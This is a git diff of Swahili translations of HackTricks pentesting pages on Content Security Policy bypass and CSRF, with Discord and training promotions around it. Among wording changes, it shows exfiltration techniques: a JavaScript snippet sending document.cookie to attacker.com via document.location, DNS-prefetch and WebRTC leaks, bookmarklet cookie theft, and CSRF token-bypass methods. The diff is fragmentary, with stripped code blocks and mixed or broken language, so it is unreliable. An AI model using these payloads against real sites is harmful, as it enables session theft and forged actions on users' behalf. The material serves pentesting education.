Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa makosa! **Uelewa wa Udukuzi**\ -Shiriki na maudhui yanayoangazia msisimko na changamoto za udukuzi +Shiriki na maudhui yanayochunguza msisimko na changamoto za udukuzi -**Habari za Udukuzi kwa Wakati Halisi**\ -Endelea kuwa na habari kuhusu ulimwengu wa udukuzi kwa kupitia habari na uelewa wa wakati halisi +**Habari za Udukuzi wa Wakati Halisi**\ +Baki na habari za hivi punde katika ulimwengu wa udukuzi kupitia habari na uelewa wa wakati halisi -**Matangazo Mapya**\ -Baki na habari kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa +**Matangazo ya Hivi Punde**\ +Baki na taarifa kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa -**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo! {% hint style="success" %} -Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Jifunze na fanya mazoezi ya Udukuzi wa AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya Udukuzi wa GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -124,7 +124,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: {% endhint %} diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md index ac3edd285..8d1dc4eed 100644 --- a/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/pentesting-web/content-security-policy-csp-bypass/README.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -80,7 +80,7 @@ object-src 'none'; * **object-src**: Inaelezea vyanzo vinavyoruhusiwa kwa vipengele vya ``, ``, na ``. * **base-uri**: Inaelezea URLs zinazoruhusiwa kwa kupakia kwa kutumia vipengele vya ``. * **form-action**: Inataja maeneo halali kwa ajili ya kuwasilisha fomu. -* **plugin-types**: Inapunguza aina za mime ambazo ukurasa unaweza kuita. +* **plugin-types**: Inapunguza aina za mime ambazo ukurasa unaweza kuitisha. * **upgrade-insecure-requests**: Inawaagiza vivinjari kuandika upya URLs za HTTP kuwa HTTPS. * **sandbox**: Inatumika vizuizi vinavyofanana na sifa ya sandbox ya ` // The bot will load an URL with the payload @@ -566,13 +566,13 @@ run(); ``` ### Via Bookmarklets -Shambulio hili litahitaji uhandisi wa kijamii ambapo mshambuliaji **anawashawishi watumiaji kuburuta na kuacha kiungo juu ya bookmarklet ya kivinjari**. Bookmarklet hii itakuwa na **kodhi mbaya ya javascript** ambayo itatekelezwa katika muktadha wa dirisha la wavuti la sasa, **ikiepuka CSP na kuruhusu kuiba taarifa nyeti** kama vile vidakuzi au tokeni. +Shambulio hili litahitaji baadhi ya uhandisi wa kijamii ambapo mshambuliaji **anawashawishi watumiaji kuvuta na kuacha kiungo juu ya bookmarklet ya kivinjari**. Bookmarklet hii itakuwa na **kodhi ya javascript mbaya** ambayo itakapovutwa na kuachwa au kubonyezwa itatekelezwa katika muktadha wa dirisha la wavuti la sasa, **ikiepuka CSP na kuruhusu kuiba taarifa nyeti** kama vile vidakuzi au tokeni. Kwa maelezo zaidi [**angalia ripoti ya asili hapa**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/). -### CSP bypass by restricting CSP +### CSP bypass kwa kuzuia CSP -Katika [**hii CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP inakabiliwa kwa kuingiza ndani ya iframe inayoruhusiwa CSP yenye vizuizi zaidi ambayo ilikataza kupakia faili maalum ya JS ambayo, kisha, kupitia **prototype pollution** au **dom clobbering** iliruhusu **kudhulumu skripti tofauti ili kupakia skripti isiyo na mpangilio**. +Katika [**hii CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP inakwepa kwa kuingiza ndani ya iframe inayoruhusiwa CSP yenye ukali zaidi ambayo ilikataza kupakia faili maalum ya JS ambayo, kisha, kupitia **uchafuzi wa prototype** au **dom clobbering** iliruhusu **kudhulumu skripti tofauti ili kupakia skripti isiyo na mpangilio**. Unaweza **kuzuia CSP ya Iframe** kwa kutumia **`csp`** sifa: @@ -582,7 +582,7 @@ Unaweza **kuzuia CSP ya Iframe** kwa kutumia **`csp`** sifa: ``` {% endcode %} -Katika [**hii CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), ilikuwa inawezekana kupitia **HTML injection** **kuzuia** zaidi **CSP** hivyo script inayozuia CSTI ilizuiliwa na kwa hivyo **udhaifu ukawa unatumika.**\ +Katika [**hii ripoti ya CTF**](https://github.com/aszx87410/ctf-writeups/issues/48), ilikuwa inawezekana kupitia **HTML injection** **kuzuia** zaidi **CSP** hivyo script inayozuia CSTI ilizuiliwa na kwa hivyo **udhaifu ukawa unatumika.**\ CSP inaweza kufanywa kuwa na vizuizi zaidi kwa kutumia **HTML meta tags** na scripts za ndani zinaweza kuzuiliwa **kuondoa** **kuingia** zinazoruhusu **nonce** zao na **kuwezesha script maalum za ndani kupitia sha**: ```html
+
-Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa makosa! -**Uelewa wa Udukuzi**\ +**Ujuzi wa Udukuzi**\ Shiriki na maudhui yanayochunguza msisimko na changamoto za udukuzi **Habari za Udukuzi za Wakati Halisi**\ -Baki na habari za kisasa katika ulimwengu wa udukuzi kupitia habari na uelewa wa wakati halisi +Endelea kuwa na habari kuhusu ulimwengu wa udukuzi kwa kupitia habari na ujuzi wa wakati halisi **Matangazo ya Karibuni**\ -Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na sasisho muhimu za jukwaa +Baki na habari kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa -**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo! ## Teknolojia Zisizo Salama za Kupita CSP @@ -642,7 +642,7 @@ Kulingana na [**mbinu ya mwisho iliyozungumziwa katika video hii**](https://www. ### Kupita kwa buffer ya majibu ya PHP PHP inajulikana kwa **kufanya buffering ya majibu hadi 4096** bytes kwa default. Hivyo, ikiwa PHP inaonyesha onyo, kwa kutoa **data ya kutosha ndani ya onyo**, **majibu** yatatumwa **kabla** ya **CSP header**, na kusababisha header ipuuzwe.\ -Kisha, mbinu inajumuisha kimsingi **kujaza buffer ya majibu na onyo** ili CSP header isitumwe. +Kisha, mbinu inajumuisha kimsingi **kujaza buffer ya majibu na maonyo** ili header ya CSP isitumwe. Wazo kutoka [**hiki andiko**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points). @@ -657,24 +657,24 @@ a.document.body.innerHTML = `` kumbuka kwamba **script** hii itakuwa **imepakiwa** kwa sababu inaruhusiwa na 'self'. Zaidi ya hayo, na kwa sababu WordPress imewekwa, mshambuliaji anaweza kutumia **shambulio la SOME** kupitia **kiungo kilichoharibika** **callback** ambacho **kinapita CSP** ili kutoa ruhusa zaidi kwa mtumiaji, kusakinisha plugin mpya...\ +Mshambuliaji anaweza kutumia kiungo hicho ili **kuunda shambulio la SOME** dhidi ya WordPress na **kuingiza** ndani ya `` kumbuka kwamba **script** hii itakuwa **imepakiwa** kwa sababu inaruhusiwa na 'self'. Zaidi ya hayo, na kwa sababu WordPress imewekwa, mshambuliaji anaweza kutumia **shambulio la SOME** kupitia **kiungo kilichoharibika** **callback** ambacho **kinapita CSP** ili kutoa ruhusa zaidi kwa mtumiaji, kufunga plugin mpya...\ Kwa maelezo zaidi kuhusu jinsi ya kutekeleza shambulio hili angalia [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/) ## CSP Exfiltration Bypasses -Ikiwa kuna CSP kali ambayo haitakuruhusu **kuingiliana na seva za nje**, kuna mambo kadhaa unaweza kufanya kila wakati ili kuhamasisha taarifa. +Ikiwa kuna CSP kali ambayo haikuruhusu **kuingiliana na seva za nje**, kuna mambo kadhaa unaweza kufanya kila wakati ili kuhamasisha taarifa. ### Location -Unaweza tu kuboresha eneo la kutuma kwa seva ya mshambuliaji taarifa ya siri: +Unaweza tu kuboresha eneo ili kutuma kwa seva ya mshambuliaji taarifa ya siri: ```javascript var sessionid = document.cookie.split('=')[1]+"."; document.location = "https://attacker.com/?" + sessionid; @@ -688,7 +688,7 @@ Unaweza kuelekeza kwa kuingiza meta tag (hii ni kuelekeza tu, hii haitavuja maud ### DNS Prefetch Ili kupakia kurasa kwa haraka, vivinjari vitakuwa vinatatua majina ya mwenyeji kuwa anwani za IP na kuyahifadhi kwa matumizi ya baadaye.\ -Unaweza kuashiria kivinjari kutatua jina la mwenyeji mapema kwa: `` +Unaweza kuonyesha kivinjari kutatua jina la mwenyeji mapema kwa: `` Unaweza kutumia tabia hii vibaya ili **kuondoa taarifa nyeti kupitia maombi ya DNS**: ```javascript @@ -713,7 +713,7 @@ Kwa kweli, mbinu hii haitumiki katika vivinjari visivyo na kichwa (bots) ### WebRTC -Katika kurasa kadhaa unaweza kusoma kwamba **WebRTC haiangalii sera ya `connect-src`** ya CSP. +Katika kurasa kadhaa unaweza kusoma kwamba **WebRTC haichunguzi sera ya `connect-src`** ya CSP. Kwa kweli unaweza _leak_ taarifa kwa kutumia _ombio la DNS_. Angalia hii code: ```javascript @@ -752,20 +752,20 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp); ​ -
+
-Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na hackers wenye uzoefu na wawindaji wa makosa! -**Maoni ya Udukuzi**\ -Shiriki na maudhui yanayoangazia msisimko na changamoto za udukuzi +**Uelewa wa Udukuzi**\ +Shiriki na maudhui yanayochunguza msisimko na changamoto za udukuzi **Habari za Udukuzi Wakati Halisi**\ -Endelea kuwa na habari kuhusu ulimwengu wa udukuzi kwa kupitia habari na maoni ya wakati halisi +Endelea kuwa na habari za haraka katika ulimwengu wa udukuzi kupitia habari na maarifa ya wakati halisi **Matangazo Mapya**\ -Baki na habari kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa +Baki na habari kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa -**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo! {% hint style="success" %} Jifunze na fanya mazoezi ya Udukuzi wa AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md index f7ef84257..564c5440b 100644 --- a/pentesting-web/csrf-cross-site-request-forgery.md +++ b/pentesting-web/csrf-cross-site-request-forgery.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -56,10 +56,10 @@ Hatua kadhaa za kinga zinaweza kutekelezwa ili kulinda dhidi ya shambulio la CSR * [**Cross-origin resource sharing**](cors-bypass.md): Sera ya CORS ya tovuti ya mwathirika inaweza kuathiri uwezekano wa shambulio, hasa ikiwa shambulio linahitaji kusoma jibu kutoka kwa tovuti ya mwathirika. [Learn about CORS bypass](cors-bypass.md). * **User Verification**: Kuuliza nenosiri la mtumiaji au kutatua captcha kunaweza kuthibitisha nia ya mtumiaji. * **Checking Referrer or Origin Headers**: Kuthibitisha vichwa hivi kunaweza kusaidia kuhakikisha maombi yanatoka kwa vyanzo vinavyotegemewa. Hata hivyo, kuunda URL kwa uangalifu kunaweza kupita ukaguzi usiofaa, kama vile: -* Using `http://mal.net?orig=http://example.com` (URL inamalizika na URL inayotegemewa) +* Using `http://mal.net?orig=http://example.com` (URL inaishia na URL inayotegemewa) * Using `http://example.com.mal.net` (URL inaanza na URL inayotegemewa) * **Modifying Parameter Names**: Kubadilisha majina ya vigezo katika maombi ya POST au GET kunaweza kusaidia kuzuia mashambulizi ya kiotomatiki. -* **CSRF Tokens**: Kuingiza tokeni ya kipekee ya CSRF katika kila kikao na kuhitaji tokeni hii katika maombi yanayofuata kunaweza kupunguza hatari ya CSRF kwa kiasi kikubwa. Ufanisi wa tokeni unaweza kuimarishwa kwa kutekeleza CORS. +* **CSRF Tokens**: Kuingiza token ya kipekee ya CSRF katika kila kikao na kuhitaji token hii katika maombi yanayofuata kunaweza kupunguza hatari ya CSRF kwa kiasi kikubwa. Ufanisi wa token unaweza kuimarishwa kwa kutekeleza CORS. Kuelewa na kutekeleza ulinzi huu ni muhimu kwa kudumisha usalama na uaminifu wa programu za wavuti. @@ -67,15 +67,15 @@ Kuelewa na kutekeleza ulinzi huu ni muhimu kwa kudumisha usalama na uaminifu wa ### From POST to GET -Labda fomu unayotaka kutumia inajiandaa kutuma **POST request with a CSRF token but**, unapaswa **kuangalia** ikiwa **GET** pia ni **halali** na ikiwa unapowasilisha GET request **CSRF token bado inathibitishwa**. +Labda fomu unayotaka kutumia inPrepared kupeleka **POST request with a CSRF token but**, unapaswa **kuangalia** ikiwa **GET** pia ni **halali** na ikiwa unapoweka ombi la GET **CSRF token bado inathibitishwa**. ### Lack of token -Programu zinaweza kutekeleza mekanismu ya **kuhakiki tokeni** wakati zipo. Hata hivyo, udhaifu unatokea ikiwa uthibitishaji unakosekana kabisa wakati tokeni haipo. Washambuliaji wanaweza kutumia hili kwa **kuondoa parameter** inayobeba tokeni, si tu thamani yake. Hii inawawezesha kupita mchakato wa uthibitishaji na kufanya shambulio la Cross-Site Request Forgery (CSRF) kwa ufanisi. +Programu zinaweza kutekeleza mekanismu ya **kuhakiki token** wakati zipo. Hata hivyo, udhaifu unatokea ikiwa uthibitishaji unakosolewa kabisa wakati token haipo. Washambuliaji wanaweza kutumia hili kwa **kuondoa parameter** inayobeba token, si tu thamani yake. Hii inawawezesha kupita mchakato wa uthibitishaji na kufanya shambulio la Cross-Site Request Forgery (CSRF) kwa ufanisi. ### CSRF token is not tied to the user session -Programu **zisizofunga tokeni za CSRF kwenye vikao vya mtumiaji** zina hatari kubwa ya **usalama**. Mifumo hii inathibitisha tokeni dhidi ya **hifadhi ya kimataifa** badala ya kuhakikisha kila tokeni inafungwa kwenye kikao kinachoanzisha. +Programu **zisizofunga token za CSRF kwenye vikao vya mtumiaji** zina hatari kubwa ya **usalama**. Mifumo hii inathibitisha token dhidi ya **hifadhi ya kimataifa** badala ya kuhakikisha kila token inafungwa kwenye kikao kinachoanzisha. Hapa kuna jinsi washambuliaji wanavyotumia hili: @@ -83,13 +83,13 @@ Hapa kuna jinsi washambuliaji wanavyotumia hili: 2. **Obtain a valid CSRF token** kutoka kwenye hifadhi ya kimataifa. 3. **Use this token** katika shambulio la CSRF dhidi ya mwathirika. -Udhaifu huu unawawezesha washambuliaji kufanya maombi yasiyoidhinishwa kwa niaba ya mwathirika, wakitumia **mchakato wa uthibitishaji wa tokeni** wa programu usiofaa. +Udhaifu huu unawawezesha washambuliaji kufanya maombi yasiyoidhinishwa kwa niaba ya mwathirika, wakitumia **mchakato wa uthibitishaji wa token usiofaa** wa programu. ### Method bypass -Ikiwa ombi linatumia **"weird"** **method**, angalia ikiwa **method** **override functionality** inafanya kazi. Kwa mfano, ikiwa inatumia **PUT** method unaweza kujaribu **kutumia POST** method na **kutuma**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_ +Ikiwa ombi linatumia **"njia"** **isiyo ya kawaida**, angalia ikiwa **ufunctionality** ya **method override** inafanya kazi. Kwa mfano, ikiwa inatumia **PUT** unaweza kujaribu **kutumia POST** na **kutuma**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_ -Hii inaweza pia kufanya kazi kwa kutuma **\_method parameter ndani ya ombi la POST** au kutumia **vichwa**: +Hii inaweza pia kufanya kazi kwa kutuma **parameter ya \_method ndani ya ombi la POST** au kutumia **vichwa**: * _X-HTTP-Method_ * _X-HTTP-Method-Override_ @@ -97,18 +97,18 @@ Hii inaweza pia kufanya kazi kwa kutuma **\_method parameter ndani ya ombi la PO ### Custom header token bypass -Ikiwa ombi linaongeza **custom header** yenye **token** kwa ombi kama **njia ya ulinzi wa CSRF**, basi: +Ikiwa ombi linaongeza **kichwa cha kawaida** chenye **token** kwa ombi kama **njia ya ulinzi wa CSRF**, basi: -* Jaribu ombi bila **Customized Token na pia header.** +* Jaribu ombi bila **Customized Token na pia kichwa.** * Jaribu ombi lenye **urefu sawa lakini token tofauti**. ### CSRF token is verified by a cookie -Programu zinaweza kutekeleza ulinzi wa CSRF kwa kuiga tokeni katika kuki na parameter ya ombi au kwa kuweka kuki ya CSRF na kuthibitisha ikiwa tokeni iliyotumwa kwenye backend inalingana na kuki. Programu inathibitisha maombi kwa kuangalia ikiwa tokeni katika parameter ya ombi inalingana na thamani katika kuki. +Programu zinaweza kutekeleza ulinzi wa CSRF kwa kuiga token katika kuki na parameter ya ombi au kwa kuweka kuki ya CSRF na kuthibitisha ikiwa token iliyotumwa kwenye backend inalingana na kuki. Programu inathibitisha maombi kwa kuangalia ikiwa token katika parameter ya ombi inalingana na thamani katika kuki. -Hata hivyo, njia hii ina udhaifu kwa shambulio la CSRF ikiwa tovuti ina kasoro zinazomruhusu mshambuliaji kuweka kuki ya CSRF kwenye kivinjari cha mwathirika, kama vile udhaifu wa CRLF. Mshambuliaji anaweza kutumia hili kwa kupakia picha ya udanganyifu inayoweka kuki, ikifuatiwa na kuanzisha shambulio la CSRF. +Hata hivyo, njia hii ina udhaifu kwa mashambulizi ya CSRF ikiwa tovuti ina kasoro zinazomruhusu mshambuliaji kuweka kuki ya CSRF kwenye kivinjari cha mwathirika, kama vile udhaifu wa CRLF. Mshambuliaji anaweza kutumia hili kwa kupakia picha ya udanganyifu inayoweka kuki, ikifuatiwa na kuanzisha shambulio la CSRF. -Hapa kuna mfano wa jinsi shambulio linaweza kuundwa: +Below is an example of how an attack could be structured: ```html @@ -125,18 +125,18 @@ Hapa kuna mfano wa jinsi shambulio linaweza kuundwa: ``` {% hint style="info" %} -Kumbuka kwamba ikiwa **csrf token inahusiana na session cookie hii shambulio halitafanya kazi** kwa sababu utahitaji kuweka mwathirika kwenye session yako, na kwa hivyo utakuwa unajishambulia mwenyewe. +Kumbuka kwamba ikiwa **csrf token inahusiana na cookie ya kikao, shambulio hili halitafanya kazi** kwa sababu utahitaji kuweka muathirika kikao chako, na hivyo utakuwa unajishambulia mwenyewe. {% endhint %} ### Mabadiliko ya Aina ya Maudhui -Kulingana na [**hii**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests), ili **kuepuka** maombi ya **preflight** kutumia njia ya **POST** hizi ndizo thamani za Aina ya Maudhui zinazoruhusiwa: +Kulingana na [**hii**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests), ili **kuepuka** maombi ya **preflight** kutumia njia ya **POST**, hizi ndizo thamani za Aina ya Maudhui zinazoruhusiwa: * **`application/x-www-form-urlencoded`** * **`multipart/form-data`** * **`text/plain`** -Hata hivyo, kumbuka kwamba **mantiki ya seva inaweza kutofautiana** kulingana na **Aina ya Maudhui** iliyotumika hivyo unapaswa kujaribu thamani zilizotajwa na nyingine kama **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._ +Hata hivyo, kumbuka kwamba **mantiki ya seva inaweza kutofautiana** kulingana na **Aina ya Maudhui** iliyotumika, hivyo unapaswa kujaribu thamani zilizotajwa na nyingine kama **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._ Mfano (kutoka [hapa](https://brycec.me/posts/corctf\_2021\_challenges)) wa kutuma data ya JSON kama text/plain: ```html @@ -163,7 +163,7 @@ Wakati wa kujaribu kutuma takwimu za JSON kupitia ombi la POST, kutumia `Content **Epuka kichwa cha Referrer** -Programu zinaweza kuthibitisha kichwa cha 'Referer' tu wakati kiko. Ili kuzuia kivinjari kutuma kichwa hiki, tag ya meta ya HTML ifuatayo inaweza kutumika: +Programu zinaweza kuthibitisha kichwa cha 'Referer' tu wakati kiko. Ili kuzuia kivinjari kutuma kichwa hiki, tagi ya meta ya HTML ifuatayo inaweza kutumika: ```xml ``` @@ -265,7 +265,7 @@ document.forms[0].submit(); //Way 3 to autosubmit ``` -### Fomu ya ombi la POST kupitia iframe +### Ombi la POST la fomu kupitia iframe ```html